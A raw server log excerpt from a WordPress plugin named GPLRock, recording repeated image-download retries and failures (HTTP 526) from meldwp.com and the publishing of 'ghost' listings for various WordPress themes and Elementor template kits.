Retrying... [05-Apr-2026 08:45:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blanquette---restaurant-wordpress-theme-2034.webp for product blanquette-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:20 UTC] GPLRock WARNING: Image download failed for product blanquette-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blanquette---restaurant-wordpress-theme-2034.webp [05-Apr-2026 08:45:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blanquette-restaurant-wordpress-theme [05-Apr-2026 08:45:20 UTC] GPLRock: Image download failed for product tinja-gaming-esports-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:23 UTC] GPLRock: Image download failed for product tinja-gaming-esports-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tinja---gaming--esports-elementor-wordpress-theme-6836.webp for product tinja-gaming-esports-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:25 UTC] GPLRock: Image download failed for product tinja-gaming-esports-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:27 UTC] GPLRock: Image download failed for product tinja-gaming-esports-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tinja---gaming--esports-elementor-wordpress-theme-6836.webp for product tinja-gaming-esports-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:29 UTC] GPLRock WARNING: Image download failed for product tinja-gaming-esports-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tinja---gaming--esports-elementor-wordpress-theme-6836.webp [05-Apr-2026 08:45:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tinja-gaming-esports-elementor-wordpress-theme [05-Apr-2026 08:45:29 UTC] GPLRock: Image download failed for product homez-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:31 UTC] GPLRock: Image download failed for product homez-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/homez--real-estate-wordpress-theme-1620.webp for product homez-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:33 UTC] GPLRock: Image download failed for product homez-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:36 UTC] GPLRock: Image download failed for product homez-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/homez--real-estate-wordpress-theme-1620.webp for product homez-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:38 UTC] GPLRock WARNING: Image download failed for product homez-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/homez--real-estate-wordpress-theme-1620.webp [05-Apr-2026 08:45:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: homez-real-estate-wordpress-theme [05-Apr-2026 08:45:38 UTC] GPLRock: Image download failed for product luxed-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:40 UTC] GPLRock: Image download failed for product luxed-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxed--creative-multipurpose-wordpress-theme-33765.webp for product luxed-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:42 UTC] GPLRock: Image download failed for product luxed-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:44 UTC] GPLRock: Image download failed for product luxed-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxed--creative-multipurpose-wordpress-theme-33765.webp for product luxed-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:46 UTC] GPLRock WARNING: Image download failed for product luxed-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luxed--creative-multipurpose-wordpress-theme-33765.webp [05-Apr-2026 08:45:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxed-creative-multipurpose-wordpress-theme [05-Apr-2026 08:45:46 UTC] GPLRock: Image download failed for product reeco-furniture-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:49 UTC] GPLRock: Image download failed for product reeco-furniture-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reeco---furniture-woocommerce-wordpress-theme-5838.webp for product reeco-furniture-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:51 UTC] GPLRock: Image download failed for product reeco-furniture-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:53 UTC] GPLRock: Image download failed for product reeco-furniture-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reeco---furniture-woocommerce-wordpress-theme-5838.webp for product reeco-furniture-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:55 UTC] GPLRock WARNING: Image download failed for product reeco-furniture-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/reeco---furniture-woocommerce-wordpress-theme-5838.webp [05-Apr-2026 08:45:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: reeco-furniture-woocommerce-wordpress-theme [05-Apr-2026 08:45:55 UTC] GPLRock: Image download failed for product clinico-premium-medical-and-health-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:57 UTC] GPLRock: Image download failed for product clinico-premium-medical-and-health-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clinico---premium-medical-and-health-theme-20825.webp for product clinico-premium-medical-and-health-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:46:00 UTC] GPLRock: Image download failed for product clinico-premium-medical-and-health-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:02 UTC] GPLRock: Image download failed for product clinico-premium-medical-and-health-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clinico---premium-medical-and-health-theme-20825.webp for product clinico-premium-medical-and-health-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:46:04 UTC] GPLRock WARNING: Image download failed for product clinico-premium-medical-and-health-theme. URL: https://meldwp.com/wp-content/uploads/clinico---premium-medical-and-health-theme-20825.webp [05-Apr-2026 08:46:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clinico-premium-medical-and-health-theme [05-Apr-2026 08:46:04 UTC] GPLRock: Image downloaded successfully for product rosey-jewelry-store-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f40e571.webp [05-Apr-2026 08:46:04 UTC] GPLRock: Using pre-downloaded image for product rosey-jewelry-store-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f40e571.webp [05-Apr-2026 08:46:04 UTC] GPLRock: Ghost product published with image - Product ID: rosey-jewelry-store-woocommerce-wordpress-theme [05-Apr-2026 08:46:04 UTC] GPLRock: Image download failed for product supremecourt-law-firm-and-attorney-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:06 UTC] GPLRock: Image download failed for product supremecourt-law-firm-and-attorney-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/supremecourt---law-firm-and-attorney-wordpress-theme-29402.webp for product supremecourt-law-firm-and-attorney-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:46:08 UTC] GPLRock: Image download failed for product supremecourt-law-firm-and-attorney-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:10 UTC] GPLRock: Image download failed for product supremecourt-law-firm-and-attorney-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/supremecourt---law-firm-and-attorney-wordpress-theme-29402.webp for product supremecourt-law-firm-and-attorney-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:46:12 UTC] GPLRock WARNING: Image download failed for product supremecourt-law-firm-and-attorney-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/supremecourt---law-firm-and-attorney-wordpress-theme-29402.webp [05-Apr-2026 08:46:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: supremecourt-law-firm-and-attorney-wordpress-theme [05-Apr-2026 08:46:41 UTC] GPLRock: Image download failed for product happy-rider-horse-school-equestrian-center-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:43 UTC] GPLRock: Image download failed for product happy-rider-horse-school-equestrian-center-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/happy-rider---horse-school--equestrian-center-wordpress-theme-29442.webp for product happy-rider-horse-school-equestrian-center-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:46:45 UTC] GPLRock: Image download failed for product happy-rider-horse-school-equestrian-center-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:47 UTC] GPLRock: Image download failed for product happy-rider-horse-school-equestrian-center-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/happy-rider---horse-school--equestrian-center-wordpress-theme-29442.webp for product happy-rider-horse-school-equestrian-center-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:46:49 UTC] GPLRock WARNING: Image download failed for product happy-rider-horse-school-equestrian-center-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/happy-rider---horse-school--equestrian-center-wordpress-theme-29442.webp [05-Apr-2026 08:46:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: happy-rider-horse-school-equestrian-center-wordpress-theme [05-Apr-2026 08:46:50 UTC] GPLRock: Image download failed for product sakuri-asian-restaurant-and-sushi-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:52 UTC] GPLRock: Image download failed for product sakuri-asian-restaurant-and-sushi-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sakuri---asian-restaurant-and-sushi-wordpress-theme-24587.webp for product sakuri-asian-restaurant-and-sushi-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:46:54 UTC] GPLRock: Image download failed for product sakuri-asian-restaurant-and-sushi-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:56 UTC] GPLRock: Image download failed for product sakuri-asian-restaurant-and-sushi-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:46:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sakuri---asian-restaurant-and-sushi-wordpress-theme-24587.webp for product sakuri-asian-restaurant-and-sushi-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:46:58 UTC] GPLRock WARNING: Image download failed for product sakuri-asian-restaurant-and-sushi-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sakuri---asian-restaurant-and-sushi-wordpress-theme-24587.webp [05-Apr-2026 08:46:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sakuri-asian-restaurant-and-sushi-wordpress-theme [05-Apr-2026 08:46:58 UTC] GPLRock: Image download failed for product lyndon-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:00 UTC] GPLRock: Image download failed for product lyndon-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lyndon---portfolio-wordpress-theme-12957.webp for product lyndon-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:03 UTC] GPLRock: Image download failed for product lyndon-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:05 UTC] GPLRock: Image download failed for product lyndon-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lyndon---portfolio-wordpress-theme-12957.webp for product lyndon-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:07 UTC] GPLRock WARNING: Image download failed for product lyndon-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lyndon---portfolio-wordpress-theme-12957.webp [05-Apr-2026 08:47:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lyndon-portfolio-wordpress-theme [05-Apr-2026 08:47:07 UTC] GPLRock: Image download failed for product swimi-swimwear-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:09 UTC] GPLRock: Image download failed for product swimi-swimwear-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swimi---swimwear-woocommerce-wordpress-theme-23233.webp for product swimi-swimwear-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:11 UTC] GPLRock: Image download failed for product swimi-swimwear-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:13 UTC] GPLRock: Image download failed for product swimi-swimwear-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swimi---swimwear-woocommerce-wordpress-theme-23233.webp for product swimi-swimwear-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:15 UTC] GPLRock WARNING: Image download failed for product swimi-swimwear-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/swimi---swimwear-woocommerce-wordpress-theme-23233.webp [05-Apr-2026 08:47:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: swimi-swimwear-woocommerce-wordpress-theme [05-Apr-2026 08:47:16 UTC] GPLRock: Image download failed for product onleash-dog-walking-pet-services-veterinary-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:18 UTC] GPLRock: Image download failed for product onleash-dog-walking-pet-services-veterinary-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onleash--dog-walking--pet-services-veterinary-wordpress-theme-3344.webp for product onleash-dog-walking-pet-services-veterinary-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:20 UTC] GPLRock: Image download failed for product onleash-dog-walking-pet-services-veterinary-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:22 UTC] GPLRock: Image download failed for product onleash-dog-walking-pet-services-veterinary-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onleash--dog-walking--pet-services-veterinary-wordpress-theme-3344.webp for product onleash-dog-walking-pet-services-veterinary-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:24 UTC] GPLRock WARNING: Image download failed for product onleash-dog-walking-pet-services-veterinary-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/onleash--dog-walking--pet-services-veterinary-wordpress-theme-3344.webp [05-Apr-2026 08:47:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: onleash-dog-walking-pet-services-veterinary-wordpress-theme [05-Apr-2026 08:47:24 UTC] GPLRock: Image download failed for product life-coach-public-speaker-personal-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:26 UTC] GPLRock: Image download failed for product life-coach-public-speaker-personal-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/life-coach---public-speaker-personal-page-wordpress-theme-16178.webp for product life-coach-public-speaker-personal-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:29 UTC] GPLRock: Image download failed for product life-coach-public-speaker-personal-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:31 UTC] GPLRock: Image download failed for product life-coach-public-speaker-personal-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/life-coach---public-speaker-personal-page-wordpress-theme-16178.webp for product life-coach-public-speaker-personal-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:33 UTC] GPLRock WARNING: Image download failed for product life-coach-public-speaker-personal-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/life-coach---public-speaker-personal-page-wordpress-theme-16178.webp [05-Apr-2026 08:47:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: life-coach-public-speaker-personal-page-wordpress-theme [05-Apr-2026 08:47:33 UTC] GPLRock: Image downloaded successfully for product interrio-wordpress-theme-for-architecture-and-interior-design (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd58667d.webp [05-Apr-2026 08:47:33 UTC] GPLRock: Using pre-downloaded image for product interrio-wordpress-theme-for-architecture-and-interior-design: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd58667d.webp [05-Apr-2026 08:47:33 UTC] GPLRock: Ghost product published with image - Product ID: interrio-wordpress-theme-for-architecture-and-interior-design [05-Apr-2026 08:47:33 UTC] GPLRock: Image download failed for product unrovr-animated-vcard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:35 UTC] GPLRock: Image download failed for product unrovr-animated-vcard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unrovr---animated-vcard-wordpress-theme-3442.webp for product unrovr-animated-vcard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:37 UTC] GPLRock: Image download failed for product unrovr-animated-vcard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:39 UTC] GPLRock: Image download failed for product unrovr-animated-vcard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unrovr---animated-vcard-wordpress-theme-3442.webp for product unrovr-animated-vcard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:42 UTC] GPLRock WARNING: Image download failed for product unrovr-animated-vcard-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/unrovr---animated-vcard-wordpress-theme-3442.webp [05-Apr-2026 08:47:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unrovr-animated-vcard-wordpress-theme [05-Apr-2026 08:47:42 UTC] GPLRock: Image download failed for product pictech-saas-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:44 UTC] GPLRock: Image download failed for product pictech-saas-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pictech---saas--startup-wordpress-theme-17506.webp for product pictech-saas-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:46 UTC] GPLRock: Image download failed for product pictech-saas-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:48 UTC] GPLRock: Image download failed for product pictech-saas-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:47:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pictech---saas--startup-wordpress-theme-17506.webp for product pictech-saas-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:47:50 UTC] GPLRock WARNING: Image download failed for product pictech-saas-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pictech---saas--startup-wordpress-theme-17506.webp [05-Apr-2026 08:47:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pictech-saas-startup-wordpress-theme [05-Apr-2026 08:47:50 UTC] GPLRock: Image downloaded successfully for product blade-responsive-multi-functional-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e454b669.webp [05-Apr-2026 08:47:50 UTC] GPLRock: Using pre-downloaded image for product blade-responsive-multi-functional-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e454b669.webp [05-Apr-2026 08:47:50 UTC] GPLRock: Ghost product published with image - Product ID: blade-responsive-multi-functional-wordpress-theme [05-Apr-2026 08:48:40 UTC] GPLRock: Image downloaded successfully for product rexbiz-corporate-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54eda152.jpg [05-Apr-2026 08:48:40 UTC] GPLRock: Using pre-downloaded image for product rexbiz-corporate-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54eda152.jpg [05-Apr-2026 08:48:40 UTC] GPLRock: Ghost product published with image - Product ID: rexbiz-corporate-agency-elementor-template-kit [05-Apr-2026 08:48:41 UTC] GPLRock: Image downloaded successfully for product repairkit-mobile-phone-computer-repair-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a80619cd.webp [05-Apr-2026 08:48:41 UTC] GPLRock: Using pre-downloaded image for product repairkit-mobile-phone-computer-repair-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a80619cd.webp [05-Apr-2026 08:48:41 UTC] GPLRock: Ghost product published with image - Product ID: repairkit-mobile-phone-computer-repair-elementor-template-kit [05-Apr-2026 08:48:43 UTC] GPLRock: Image downloaded successfully for product realesta-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-45523619.webp [05-Apr-2026 08:48:43 UTC] GPLRock: Using pre-downloaded image for product realesta-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-45523619.webp [05-Apr-2026 08:48:43 UTC] GPLRock: Ghost product published with image - Product ID: realesta-real-estate-elementor-template-kit [05-Apr-2026 08:48:45 UTC] GPLRock: Image downloaded successfully for product qudrat-islamic-center-mosque-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-af5b9e10.jpg [05-Apr-2026 08:48:45 UTC] GPLRock: Using pre-downloaded image for product qudrat-islamic-center-mosque-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-af5b9e10.jpg [05-Apr-2026 08:48:45 UTC] GPLRock: Ghost product published with image - Product ID: qudrat-islamic-center-mosque-elementor-template-kit [05-Apr-2026 08:48:46 UTC] GPLRock: Image downloaded successfully for product publibox-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8756c402.webp [05-Apr-2026 08:48:46 UTC] GPLRock: Using pre-downloaded image for product publibox-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8756c402.webp [05-Apr-2026 08:48:46 UTC] GPLRock: Ghost product published with image - Product ID: publibox-blog-magazine-elementor-template-kit [05-Apr-2026 08:48:48 UTC] GPLRock: Image downloaded successfully for product printify-printing-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-809acebc.webp [05-Apr-2026 08:48:48 UTC] GPLRock: Using pre-downloaded image for product printify-printing-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-809acebc.webp [05-Apr-2026 08:48:48 UTC] GPLRock: Ghost product published with image - Product ID: printify-printing-company-elementor-template-kit [05-Apr-2026 08:48:49 UTC] GPLRock: Image downloaded successfully for product preemptive-business-finance-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4516fe46.webp [05-Apr-2026 08:48:49 UTC] GPLRock: Using pre-downloaded image for product preemptive-business-finance-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4516fe46.webp [05-Apr-2026 08:48:49 UTC] GPLRock: Ghost product published with image - Product ID: preemptive-business-finance-elementor-template-kit [05-Apr-2026 08:48:51 UTC] GPLRock: Image downloaded successfully for product nayaka-nail-salon-beauty-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9d2a732e.webp [05-Apr-2026 08:48:51 UTC] GPLRock: Using pre-downloaded image for product nayaka-nail-salon-beauty-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9d2a732e.webp [05-Apr-2026 08:48:51 UTC] GPLRock: Ghost product published with image - Product ID: nayaka-nail-salon-beauty-care-elementor-template-kit [05-Apr-2026 08:48:52 UTC] GPLRock: Image downloaded successfully for product naturel-garden-landscaping-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-13d7adf5.webp [05-Apr-2026 08:48:52 UTC] GPLRock: Using pre-downloaded image for product naturel-garden-landscaping-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-13d7adf5.webp [05-Apr-2026 08:48:52 UTC] GPLRock: Ghost product published with image - Product ID: naturel-garden-landscaping-elementor-template-kit [05-Apr-2026 08:48:53 UTC] GPLRock: Image downloaded successfully for product nature-spa-massage-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60351d76.webp [05-Apr-2026 08:48:54 UTC] GPLRock: Using pre-downloaded image for product nature-spa-massage-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60351d76.webp [05-Apr-2026 08:48:54 UTC] GPLRock: Ghost product published with image - Product ID: nature-spa-massage-elementor-template-kit [05-Apr-2026 08:51:14 UTC] GPLRock: Image download failed for product golden-hearts-fundraising-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:16 UTC] GPLRock: Image download failed for product golden-hearts-fundraising-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:51:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/golden-hearts---fundraising--charity-wordpress-theme-4098.webp for product golden-hearts-fundraising-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:51:18 UTC] GPLRock: Image download failed for product golden-hearts-fundraising-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... 